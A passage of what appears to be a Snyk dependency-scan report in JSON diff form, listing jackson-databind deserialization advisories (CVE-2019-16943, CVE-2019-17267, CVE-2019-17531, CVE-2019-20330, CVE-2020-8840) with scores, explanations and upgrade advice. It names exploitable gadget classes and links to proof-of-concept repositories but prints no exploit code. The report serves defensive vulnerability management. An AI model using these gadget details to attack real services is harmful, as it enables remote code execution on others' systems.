"com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.814203Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16943" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fmmc-742q-jg75" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:03:39.391997Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.024581Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2460", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:04.701685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", + "epssDetails": { + "percentile": "0.85119", + "probability": "0.01174", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17267" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f3j5-rmmp-3fc5" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-07T10:05:31.629572Z", + "functions_new": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-07T01:14:26Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-07T01:14:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.064844Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Zhangxianhui" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Blog Post" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2498", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:58.282653Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", + "epssDetails": { + "percentile": "0.80301", + "probability": "0.00690", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17531" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-gjmw-vf9h-g25v" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-13T07:40:03.046000Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-12T21:52:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-13T07:41:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.918541Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "UltramanGaia" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2526", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:49.242419Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", + "epssDetails": { + "percentile": "0.79103", + "probability": "0.00622", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-20330" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-01-03T10:26:22.562970Z", + "functions_new": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-01-03T05:14:08Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-01-03T05:14:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.922905Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2620", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/jas502n/jackson-CVE-2020-8840", + "title": "Jackson PoC" + }, + { + "url": "https://github.com/jas502n/CVE-2020-8840", + "title": "PoC" + }, + { + "url": "https://github.com/Veraxy01/CVE-2020-8840", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:13.011056Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the 